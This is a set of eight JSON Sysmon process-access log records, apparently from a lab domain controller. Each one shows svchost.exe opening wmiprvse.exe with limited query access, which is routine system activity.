{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1071,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:12.987\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F66-5F25-0000-0010B7B90100}\r\nTargetProcessId: 2812\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:12.987","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F66-5F25-0000-0010B7B90100}","TargetProcessId":"2812","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1072,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:12.987\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F66-5F25-0000-0010B7B90100}\r\nTargetProcessId: 2812\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:12.987","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F66-5F25-0000-0010B7B90100}","TargetProcessId":"2812","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1073,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:12.987\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F66-5F25-0000-0010B7B90100}\r\nTargetProcessId: 2812\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:12.987","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F66-5F25-0000-0010B7B90100}","TargetProcessId":"2812","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1074,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:12.987\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F66-5F25-0000-0010B7B90100}\r\nTargetProcessId: 2812\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:12.987","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F66-5F25-0000-0010B7B90100}","TargetProcessId":"2812","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1075,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:12.987\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F66-5F25-0000-0010B7B90100}\r\nTargetProcessId: 2812\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:12.987","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F66-5F25-0000-0010B7B90100}","TargetProcessId":"2812","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1076,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:12.987\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F66-5F25-0000-0010B7B90100}\r\nTargetProcessId: 2812\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:12.987","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F66-5F25-0000-0010B7B90100}","TargetProcessId":"2812","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1077,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:13.002\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F66-5F25-0000-0010B7B90100}\r\nTargetProcessId: 2812\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:13.002","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F66-5F25-0000-0010B7B90100}","TargetProcessId":"2812","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1078,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:13.002\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F66-5F25-0000-0010B7B90100}\r\nTargetProcessId: 2812\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:13.002","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F66-5F25-0000-0010B7B90100}","TargetProcessId":"2812","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
